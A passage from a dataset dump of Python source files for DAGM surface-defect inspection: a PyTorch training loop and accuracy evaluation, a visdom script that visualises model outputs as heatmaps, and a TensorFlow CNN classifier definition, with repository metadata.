\n self.network.train()\n \n# minCost = 100000.\n# maxAccuracy = 0.\n elapsed_time = 0.\n# current_epoch = 0\n \n # train my model\n print('Learning Started!') \n start_time = time.perf_counter()\n \n \n #############################################################3\n \n \n self.data.getBlockImages(blockH=self.featureH, blockW=self.featureW,\n nOKperClass=40, nNGperClass=40, \n classNoList=self.args.classNoList, \n label_type='index', isTrain=False)\n ############################################################# \n current_accuracy = 0\n max_accuracy = self.args.optimalAccuracyThreshold\n for i in range(nReDataGeneration):\n \n eps_time = AverageMeter()\n bar = Bar('Training '+str(i), max=self.args.nTrainingEpochs)\n end = time.time()\n \n self.data.getBlockImages(blockH=self.featureH, blockW=self.featureW, \n nOKperClass=160, nNGperClass=160, \n classNoList=self.args.classNoList, \n label_type='index', isTrain=True)\n \n Xnp = self.data.train.images\n Ynp = self.data.train.labels\n x = 
torch.from_numpy(Xnp.reshape([-1,self.featureC,self.featureW,self.featureH]))\n y = torch.from_numpy(Ynp)\n dataset = TensorDataset(data_tensor=x, target_tensor=y) \n self.train_loader = DataLoader(dataset, batch_size=self.args.batch_size, shuffle=True) \n \n for epoch in range(1, nTrainingEpochs+1):\n for k, [image,label] in enumerate(self.train_loader):\n \n image = Variable(image) \n label = Variable(label) \n \n if self.args.isGPU:\n image = image.cuda()\n label = label.cuda() \n \n \n self.optimizer.zero_grad()\n \n output = self.network(image)\n output = self.softmax(output)\n# print(output.size())\n# print(label.size())\n loss = self.loss_func(output, label)\n \n loss.backward()\n self.optimizer.step() \n \n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=epoch, maxeps=self.args.nTrainingEpochs, et=eps_time.avg,\n total=bar.elapsed_td, eta=bar.eta_td)\n bar.next()\n \n if epoch % 2 == 0: \n print('--------------------------------------------------------------------')\n torch.save(self.network, self.saveModelPath) \n torch.save(self.network.state_dict(), self.saveParamsPath ) # It saves only the model parameters (recommended) \n \n torch.save(self.network, self.backupModelPath) \n torch.save(self.network.state_dict(), self.backupParamsPath)\n \n current_accuracy = commander.getCurrentAccuracy(batch_size=256, numIter=1, isTrainData=False)\n if self.args.isGPU:\n loss = loss.cpu() \n# current_accuracy = current_accuracy.cpu() \n# current_accuracy = current_accuracy.data.numpy()[0]\n self.network.train() \n print('|=====================================================================|') \n print('|===== Epoch : %04d' % (i*nTrainingEpochs + epoch), \"======================|\" )\n print('|===== Loss : ', loss.data.numpy()[0], \"========================|\" )\n print(\"|===== Current accuracy : %.1f\" % (current_accuracy*100.), \"% =====|\")\n print('|=====================================================================|') \n if current_accuracy >= max_accuracy:\n max_accuracy = current_accuracy \n torch.save(self.network, self.optimalModelPath)\n torch.save(self.network.state_dict(), self.optimalParamsPath) \n break\n \n if current_accuracy >= max_accuracy: \n break\n \n bar.finish()\n \n elapsed_time = (time.perf_counter() - start_time)\n \n# accuracy_train = self.getCurrentAccuracy(batch_size=self.args.batch_size, isTrainData=True) \n# accuracy_test = self.getCurrentAccuracy(batch_size=self.args.batch_size, isTrainData=False) \n# if args.isGPU:\n# accuracy_train = accuracy_train.cpu() \n# accuracy_test = accuracy_test.cpu()\n \n print('=====================================================================') \n# print(\"Accuracy for training data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n# print(\"Accuracy for test data : %.1f\" % (accuracy_test.data.numpy()[0]*100.), \"%\")\n print('Elapsed %.3f seconds.' 
% elapsed_time)\n print('%.0f h' % (elapsed_time/3600), '%.0f m' % ((elapsed_time%3600)/60) , '%.0f s' % (elapsed_time%60) )\n print('Learning Finished!') \n print('=====================================================================')\n \n \n def getCurrentAccuracy(self, batch_size, numIter=1, isTrainData=False):\n \n self.network.eval()\n \n channel = args.feature_shape[0]\n height = args.feature_shape[1]\n width = args.feature_shape[2] \n\n dataset = self.data.test\n if isTrainData:\n dataset = self.data.train\n \n Xnp = self.data.test.images \n Ynp = self.data.test.labels\n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n \n test_loader = DataLoader(TensorDataset(data_tensor=x, target_tensor=y), \n batch_size=batch_size, shuffle=True) \n \n avg_accuracy = 0.0\n \n# tester = iter(test_loader)\n# for i in range(numIter):\n# Xs_tensor, Ys_tensor = tester.next() \n numIter = 0\n for k, [Xs_tensor,Ys_tensor] in enumerate(test_loader):\n \n# Y = Y.view(-1,1)\n# print(Y)\n Xs_var = Variable(Xs_tensor, volatile=True)\n Ys_var = Variable(Ys_tensor, volatile=True)\n \n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n Ys_var = Ys_var.cuda()\n \n output_var = self.network(Xs_var)\n output_var = self.softmax(output_var)\n \n _, prediction = torch.max(output_var,1)\n \n# for k in range(batch_size):\n# plt.imshow(Xnp[k], cmap='gray')\n# plt.show()\n# plt.imsave( 'a.png', Xnp[k], cmap='gray')\n# print(prediction)\n \n accuracy = (prediction==Ys_var).double().sum()/output_var.size()[0] \n# print(accuracy)\n if args.isGPU:\n accuracy = accuracy.cpu()\n \n avg_accuracy += accuracy.data.numpy()[0]\n numIter += 1\n \n avg_accuracy /= numIter\n \n return avg_accuracy\n \n \n \n def checkTrainingResult(self, nOutput=1, isResultSave=True):\n \n self.network.eval()\n \n channel = args.feature_shape[0]\n height = args.feature_shape[1]\n width = args.feature_shape[2] \n\n \n Xnp = self.data.test.images\n Ynp = self.data.test.labels\n \n \n \n x = torch.from_numpy(Xnp.reshape([-1,channel,height,width])) \n y = torch.from_numpy(Ynp) \n dataset = TensorDataset(data_tensor=x, target_tensor=y) \n test_loader = DataLoader(dataset, batch_size=nOutput, shuffle=True) \n \n\n tester = iter(test_loader)\n Xs_tensor, Ys_tensor = tester.next()\n \n Xs_var = Variable(Xs_tensor)\n if self.args.isGPU:\n Xs_var = Xs_var.cuda()\n \n output_var, indices, pool_sizes = self.convNet(Xs_var, self.args.isGPU)\n output_var = self.deconvNet(output_var, indices, pool_sizes)\n# if self.last_activation=='S':\n# output = self.Sigmoid(output)\n# output = self.Softmax2d(output)\n\n if self.args.isGPU:\n Xs_var = Xs_var.cpu()\n output_var = output_var.cpu()\n \n# out_img = torch.squeeze(output.data)\n original_img = Xs_var.data.view(-1,height,height) \n label_img = Ys_tensor.view(-1,height,width)\n outputSize = output_var.data.size()\n out_img = output_var.data.view(-1,outputSize[2],outputSize[3])\n \n for i in range(nOutput): \n originalImg = original_img[i].numpy()\n# print(originalImg)\n labelImg = label_img[i].numpy()\n outputImg = out_img[i].numpy()\n # a colormap and a normalization instance\n cmap = plt.cm.jet\n norm = plt.Normalize(vmin=outputImg.min(), vmax=outputImg.max()) \n # map the normalized data to colors\n resultImg = cmap(norm(outputImg))\n \n if isResultSave:\n# filePath = self.resultFolderPath + 'original%d.png' % i\n# plt.imsave(filePath, originalImg, cmap='gray') \n# filePath = self.resultFolderPath + 'label%d.png' % i\n# plt.imsave(filePath, labelImg, cmap='gray') \n filePath 
= self.resultFolderPath + 'output%d.png' % i\n plt.imsave(filePath, outputImg, cmap='gray')\n \n \n# from PIL import Image \n# buffer = np.hstack((originalImg, resultImg)) \n# filePath = self.resultFolderPath + 'compared_result%d.png' % i\n# plt.imsave(filePath, buffer, cmap='gray')\n \n filePath = self.resultFolderPath + 'heatmap%d.png' % i\n plt.imsave(filePath, resultImg) \n \n \n plt.subplot(1,3,1) \n plt.imshow(originalImg, cmap='gray') \n plt.subplot(1,3,2)\n plt.imshow(outputImg, cmap='gray')\n plt.subplot(1,3,3)\n plt.imshow(resultImg)\n plt.show() \n \n print(\"Input size (H, W) :\", originalImg.shape)\n print(\"Output size (H, W) :\", (out_img.size()[1], out_img.size()[2]))\n print(\"========================================================\")\n print(\"========================================================\")\n \n \n\nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n# 'dataPath' : '../../../JKcloud/DB_JK/DAGM2007_dataset',\n 'dataPath' : '../../../JKcloud/DB_JK/DAGM_dataset',\n 'training' : False ,\n 'isGPU' : True, # False, # True,\n 'load_model': True, \n 'load_folder_file': (\"DAGM2_resnetJK0_resnet18v1_32_12\",'recent'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n 'save_folder_file': (\"DAGM2_resnetJK0_resnet18v1_32_12\",'optimal0'), # (\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), (DAGM_jkfcn3/, jkfcn3) \n 'optimalModelName' : 'optimal0',\n 'optimalAccuracyThreshold' : 0.99,\n 'featureType' : 'block', # block \\ full\n 'label_format' : 2,\n 'classNoList' : [1,2,3,4,5,6],\n 'feature_shape' : [1, 32, 32], # channel, H, W \n 'label_size' : 12, # index 0 : something we don't know\n 'nReDataExtraction' : 2000,\n 'nTrainingEpochs': 50, \n 'batch_size' : 256, \n 'learning_rate' : 1e-5,\n }) \n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n import dagmCV2 as DAGM\n\n# dagm = DAGM.DAGM(args.dataPath) \n dagm = DAGM.DAGM(args.dataPath, label_format=args.label_format) \n commander = Commander( args=args, data=dagm) \n \n if(args.training==True): \t \n commander.train( nReDataGeneration=args.nReDataExtraction, nTrainingEpochs=args.nTrainingEpochs, batch_size=args.batch_size) \n \n elif(args.training==False): \n commander.data.getBlockImages(blockH=args.feature_shape[1], blockW=args.feature_shape[2], \n nOKperClass=1, nNGperClass=1, classNoList=args.classNoList, \n label_type='index', isTrain=False)\n \n accuracy_test = commander.getCurrentAccuracy(batch_size=100, numIter=1, isTrainData=False) \n \n# if args.isGPU:\n# accuracy_test = accuracy_test.cpu()\n \n print('=====================================================================') \n# print(\"Accuracy for training-data : %.1f\" % (accuracy_train.data.numpy()[0]*100.), \"%\")\n 
print(\"Accuracy for test-data : %.1f\" % (accuracy_test*100.), \"%\")\n print('=====================================================================') \n\n "
},
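The train loop above maintains three kinds of checkpoints (recent backup, named save, optimal). The keep-the-best core of that pattern, as a hedged sketch -- the tiny model and evaluate() are placeholders; only the torch.save / state_dict usage mirrors the script:

    import torch
    import torch.nn as nn

    net = nn.Linear(4, 2)          # stand-in for the Network above
    best = 0.99                    # cf. args.optimalAccuracyThreshold

    def evaluate(model):           # hypothetical accuracy function
        return 0.995

    acc = evaluate(net)
    torch.save(net.state_dict(), 'recent_params.pkl')       # always refresh the backup
    if acc >= best:
        best = acc
        torch.save(net.state_dict(), 'optimal_params.pkl')  # promote to optimal

Saving state_dict alongside the whole pickled module (the script does both) keeps checkpoints loadable even when the class definition later changes.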
{
"alpha_fraction": 0.5684412717819214,
"alphanum_fraction": 0.587317705154419,
"avg_line_length": 32.67557144165039,
"blob_id": "25bb1f471cc5671ac3c90a7f1211acda3a29a323",
"content_id": "94c0f5052088ed2aa85aa3d89d2467c200326934",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8847,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 262,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_fcn_evaluation_visdom.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport time\nimport glob\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport torch\n#import torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\n#from torch.utils.data import TensorDataset\n#from torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\n#import matplotlib.pyplot as plt\nimport cv2\nimport visdom\n\nsys.path.append(\"../../ML_utils\") # parent directory\nimport JK_image\n\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\nsys.path.append(\"networks\") # parent directory\n\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if isGPU:\n array_torch = Variable(array_torch).cuda()\n else :\n array_torch = Variable(array_torch).cpu()\n return array_torch\n\n\ndef detectDefectViaVisdom( args, result_type=1, isResultSave=True):\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n modelPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + '_all.pkl'\n convParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'convParams.pkl'\n deconvParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'deconvParams.pkl'\n \n \n convNet = \"\"\n deconvNet = \"\" \n \n try:\n print(\"Model path :\", modelPath)\n convNet, deconvNet = torch.load(modelPath, map_location=lambda storage, location: storage)\n print(\"\\n--------\" + modelPath + \" is restored--------\\n\")\n \n# print(\"Conv parameters path :\", convParamsPath)\n# print(\"Deconv parameters path :\", deconvParamsPath)\n# convNet.load_state_dict(torch.load(convParamsPath)) # it loads only the model parameters (recommended) \n# deconvNet.load_state_dict(torch.load(deconvParamsPath)) # it loads only the model parameters (recommended)\n# print(\"\\n--------\" + convParamsPath + \" is restored--------\\n\")\n# print(\"\\n--------\" + deconvParamsPath + \" is restored--------\\n\") \n \n if args.isGPU:\n convNet.cuda()\n deconvNet.cuda() \n else :\n convNet.cpu()\n deconvNet.cpu() \n \n except:\n print(\"\\n--------There are no models.--------\\n\")\n pass\n \n \n convNet.eval()\n deconvNet.eval()\n \n# images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n \n X = np.array(images, dtype=np.float32)/255. 
\n X = X.reshape([-1,1,height,width]) \n \n# XX = np.hstack([X[0], X[1]]).reshape([-1,1,512,2*512])\n# X = XX\n \n X_tensor = torch.from_numpy(X) \n if args.isGPU:\n X = Variable(X_tensor).cuda()\n else :\n X = Variable(X_tensor).cpu()\n\n# X = numpyToTorchVariable(X, args.isGPU)\n\n output = convNet(X)\n output = deconvNet(output) \n\n if args.isGPU:\n output = output.cpu()\n \n Y_tensor = output.data \n \n vis = visdom.Visdom() \n \n if result_type==0:\n for i in range(nImages):\n vis.image(Y_tensor[i])\n \n elif result_type==1:\n \n results_tensor = torch.cat((X_tensor, Y_tensor), 0) \n vis.images(X_tensor, nrow=6) \n vis.images(Y_tensor, nrow=6) \n vis.images(results_tensor, nrow=6) \n \n # kk = out_images.numpy().reshape(-1,512,512)\n # heat = np.hstack([kk[0], kk[1]]).reshape([512,2*512]) \n # vis.heatmap(heat)\n\n elif result_type==2:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n for i in range(nImages): \n inputImg = inputImages_np[i] \n# tempInput = JK_image.GRAY2CRGB(inputImg)\n tempInput = cv2.cvtColor(inputImg, cv2.COLOR_GRAY2BGR)\n tempInput = JK_image.HWC3toC3HW(tempInput)\n \n outputImg = outputImages_np[i]\n tempOutput = cv2.cvtColor(outputImg, cv2.COLOR_GRAY2BGR)\n tempOutput = JK_image.HWC3toC3HW(tempOutput)\n tempHeatmap = JK_image.GRAY2HeatMap(outputImg)\n \n tempInput = np.array(tempInput).reshape(-1, 3, height, width)\n tempOutput = np.array(tempOutput).reshape(-1, 3, height, width)\n tempHeatmap = np.array(tempHeatmap).reshape(-1, 3, height, width)\n \n result = np.concatenate((tempInput, tempOutput), axis=0)\n result = np.concatenate((result, tempHeatmap), axis=0)\n vis.images(result, nrow=6)\n \n \n elif result_type==3:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n# inputImages = []\n# outputImages = []\n# heatmapImages = []\n resultImages = []\n for i in range(nImages): \n \n inputImg = JK_image.HWC3toC3HW( cv2.cvtColor(inputImages_np[i], cv2.COLOR_GRAY2RGB) )\n outputGray = JK_image.HWC3toC3HW( cv2.cvtColor(outputImages_np[i] , cv2.COLOR_GRAY2RGB) )\n outputHeat = JK_image.GRAY2HeatMap(outputImages_np[i] )\n \n resultImg = np.concatenate((inputImg, outputGray), axis=0)\n resultImg = np.concatenate((resultImg, outputHeat), axis=0) \n resultImages.append(resultImg)\n \n# inputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(inputImg, cv2.COLOR_GRAY2RGB) ) )\n# outputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(outputImg, cv2.COLOR_GRAY2RGB) ) )\n# heatmapImages.append( util_image.GRAY2HeatMap(outputImg) )\n \n# inputImages = np.array(inputImages).reshape(-1, 3, height, width)\n# outputImages = np.array(outputImages).reshape(-1, 3, height, width)\n# heatmapImages = np.array(heatmapImages).reshape(-1, 3, height, width) \n# results = np.concatenate((inputImages, outputImages), axis=0)\n# results = np.concatenate((results, heatmapImages), axis=0)\n# vis.images(results, nrow=6)\n\n resultImages = np.array(resultImages).reshape(-1, 3, height, width) \n vis.images(resultImages, nrow=3)\n \n print(\"Input size :\", X_tensor.size())\n print(\"Output size :\", Y_tensor.size())\n print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo 
= torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 'load_folder_file': (\"DAGM_jkfcn3/\",'jkfcn3'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"../DataForEvaluation\",\n })\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n \n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n detectDefectViaVisdom(args, result_type=0) \n \n \n "
},
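The JK_image helpers the script imports are not included in this dump; a plausible reconstruction of the two that matter for visdom, inferred from how checkTrainingResult builds its jet heatmaps (both functions are assumptions, not the actual library code):

    import numpy as np
    import matplotlib.pyplot as plt

    def hwc3_to_c3hw(img):
        # assumed equivalent of JK_image.HWC3toC3HW: (H, W, 3) -> (3, H, W)
        return np.transpose(img, (2, 0, 1))

    def gray_to_heatmap(gray):
        # assumed equivalent of JK_image.GRAY2HeatMap: normalise, apply the
        # jet colormap, drop alpha and return channel-first for visdom
        norm = plt.Normalize(vmin=gray.min(), vmax=gray.max())
        rgba = plt.cm.jet(norm(gray))        # (H, W, 4) floats in [0, 1]
        return np.transpose(rgba[..., :3], (2, 0, 1))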
{
"alpha_fraction": 0.4507253170013428,
"alphanum_fraction": 0.4873359501361847,
"avg_line_length": 55.52317810058594,
"blob_id": "92ac5dcf1bf67bcffb7b5becbec79e7de197b415",
"content_id": "4001f5f4b09916dac5f9f810e88c3a620060f378",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8686,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 151,
"path": "/DAGM/DAGM_CNN_final/networks/jknet1.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 24 10:56:53 2017\r\n\r\n@author: Jaekyung\r\n\"\"\"\r\nimport sys, os\r\nsys.path.append(os.pardir) # parent directory\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ntf.set_random_seed(777) # reproducibility\r\n\r\n\r\nclass Model:\r\n \r\n def __init__(self, sess, name, learning_rate=0.0001, feature_shape=[32,32,1], lable_size=12, weight_decay_rate=1e-5):\r\n self.sess = sess\r\n self._name = name\r\n self._learning_rate = learning_rate\r\n self._feature_shape = feature_shape\r\n self._lable_size = lable_size\r\n \r\n self.kernel_regularizer = tf.contrib.layers.l2_regularizer(scale=weight_decay_rate)\r\n \r\n self._build_net()\r\n \r\n \r\n \r\n def _build_net(self): \r\n with tf.variable_scope(self._name):\r\n # dropout (keep_prob) rate 0.7~0.5 on training, but should be 1\r\n # for testing \r\n self.training = tf.placeholder(tf.bool, name=\"training\")\r\n\r\n # input place holders\r\n self.X = tf.placeholder( tf.float32, [None, self._feature_shape[0]*self._feature_shape[1]*self._feature_shape[2]], name=\"input\") \r\n X_img = tf.reshape(self.X, [-1, self._feature_shape[0], self._feature_shape[1], self._feature_shape[2]])\r\n self.Y = tf.placeholder(tf.float32, [None, self._lable_size])\r\n \r\n # Convolutional Layer #1 and # Pooling Layer #1\r\n conv11 = tf.layers.conv2d(inputs=X_img, filters=64, kernel_size=[3,3], \r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,60,60,64)\r\n\r\n conv12 = tf.layers.conv2d(inputs=conv11, filters=64, kernel_size=[3,3], \r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,60,60,64)\r\n \r\n pool1 = tf.layers.max_pooling2d(inputs=conv12, pool_size=[2,2],\r\n padding=\"SAME\", strides=2) # (?,14,14,64) # (?,16,16,64)32\r\n \r\n dropout1 = tf.layers.dropout(inputs=pool1, \r\n rate=0.7, training=self.training)\r\n \r\n # Convolutional Layer #2 and Pooling Layer #2\r\n conv21 = tf.layers.conv2d(inputs=dropout1, filters=128, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64)\r\n \r\n conv22 = tf.layers.conv2d(inputs=conv21, filters=128, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64)\r\n \r\n conv23 = tf.layers.conv2d(inputs=conv22, filters=128, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,64)\r\n \r\n pool2 = tf.layers.max_pooling2d(inputs=conv23, pool_size=[2,2],\r\n padding=\"SAME\", strides=2) # (?,7,7,64) # (?,8,8,64)16\r\n \r\n dropout2 = tf.layers.dropout(inputs=pool2,\r\n rate=0.7, training=self.training)\r\n \r\n # Convolutional Layer #2 and Pooling Layer #3\r\n conv31 = tf.layers.conv2d(inputs=dropout2, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n conv32 = tf.layers.conv2d(inputs=conv31, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n 
kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n conv33 = tf.layers.conv2d(inputs=conv32, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n conv34 = tf.layers.conv2d(inputs=conv33, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n pool3 = tf.layers.max_pooling2d(inputs=conv34, pool_size=[2,2],\r\n padding=\"SAME\", strides=2) # (?,4,4,256) # (?,4,4,256)8\r\n \r\n dropout3 = tf.layers.dropout(inputs=pool3,\r\n rate=0.7, training=self.training)\r\n \r\n # Dense Layer with Relu ========================================================================\r\n flat = tf.reshape(dropout3, [-1, 256*4*4]) # 32-(?,4*4*128) # 60-(?,8*8*128) \r\n \r\n dense4 = tf.layers.dense(inputs=flat, units=1024, activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,1024)\r\n \r\n dropout4 = tf.layers.dropout(inputs=dense4, rate=0.5, training=self.training)\r\n \r\n dense5 = tf.layers.dense(inputs=dropout4, units=1024, activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,1024)\r\n \r\n dropout5 = tf.layers.dropout(inputs=dense5, rate=0.5, training=self.training)\r\n \r\n self.logits = tf.layers.dense(inputs=dropout5, units=self._lable_size, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer ) # (?,2)\r\n \r\n \r\n self.prob = tf.nn.softmax(self.logits, name=\"prob\")\r\n self.result = tf.argmax(self.logits, 1, name=\"result\")\r\n \r\n # define cost/loss & optimizer\r\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=self.logits, labels=self.Y))\r\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self._learning_rate).minimize(self.cost)\r\n\r\n correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.Y, 1))\r\n \r\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n def predict(self, x_test, training=False):\r\n return self.sess.run(self.prob,\r\n feed_dict={self.X: x_test, self.training: training})\r\n\r\n def get_accuracy(self, x_test, y_test, training=False):\r\n return self.sess.run(self.accuracy,\r\n feed_dict={self.X: x_test,\r\n self.Y: y_test, self.training: training})\r\n\r\n def train(self, x_data, y_data, training=True):\r\n return self.sess.run([self.cost, self.optimizer], feed_dict={\r\n self.X: x_data, self.Y: y_data, self.training: training})\r\n"
}
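A minimal driver sketch for the Model class above (the constructor and method signatures come from the class itself; the session setup and random batch are assumptions, and networks/ is presumed to be on the import path):

    import numpy as np
    import tensorflow as tf
    from jknet1 import Model

    sess = tf.Session()
    model = Model(sess, 'jknet1', feature_shape=[32, 32, 1], lable_size=12)
    sess.run(tf.global_variables_initializer())

    x_batch = np.random.rand(8, 32 * 32 * 1)           # flat features, as self.X expects
    y_batch = np.eye(12)[np.random.randint(0, 12, 8)]  # one-hot labels
    cost, _ = model.train(x_batch, y_batch)
    print(cost, model.get_accuracy(x_batch, y_batch))

Note the keyword argument keeps the class's `lable_size` spelling, since renaming it would break the constructor.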
] | 16 |
drpoggi/pydantic
|
https://github.com/drpoggi/pydantic
|
72df1211ebf9968cb7f38a3d97ef78cf0942bbf6
|
27887c6e997671ff0ea9d8f815e7628a40eb1134
|
48bffbc25b2c8ba60395b7d5eafdd7911b736857
|
refs/heads/master
| 2021-01-25T14:34:11.654404 | 2018-03-02T13:29:19 | 2018-03-02T13:29:19 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4861878454685211,
"alphanum_fraction": 0.6795580387115479,
"avg_line_length": 15.454545021057129,
"blob_id": "c860d184dbbb992f44f301e014a6928a8f21b383",
"content_id": "50154ec5ea2ce5f4fa90dafbf56c963e9ee01eb1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 181,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 11,
"path": "/tests/requirements.txt",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
